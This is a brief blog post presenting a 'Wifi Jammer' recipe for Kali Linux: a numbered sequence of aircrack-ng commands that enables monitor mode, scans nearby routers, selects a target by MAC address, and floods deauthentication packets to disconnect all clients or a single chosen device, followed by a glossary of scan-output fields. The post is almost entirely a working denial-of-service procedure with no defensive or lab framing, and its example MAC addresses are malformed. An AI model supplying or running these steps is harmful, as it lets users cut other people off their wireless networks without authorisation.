Developer Snippet Diary

Wifi Jammer using kali linux

WIFI JAMER

  • #iwconfig //check interfaces
  • #airmon-ng start wlan0 //enable moniter mode
  • #airodump-ng wlan0mon //find all nears wifi routers
  • #airodump-ng -c 6 --bssid A0-B3-CC-D4-E3 wlan0mon //select an router
  • #aireplay-ng -0 0 -a A0-B3-CC-D4-E3 wlan0mon //send deauth packets to all stations -0 0
  • #aireplay-ng -0 0 -a A0-B3-CC-D4-E3 -c 10-c3-AA-A4-B3 //send deauth to 10-c3-AA-A4-B3 station only

bssid: Router mac address , station: that is connected with router , beacons: packets sended by access point, pwr: signal level, ch:chanel number , MB: maximum speed of access point, ENC: encryption algorithm ,

Posted by: R GONDAL
Email: rizikmw@gmail.com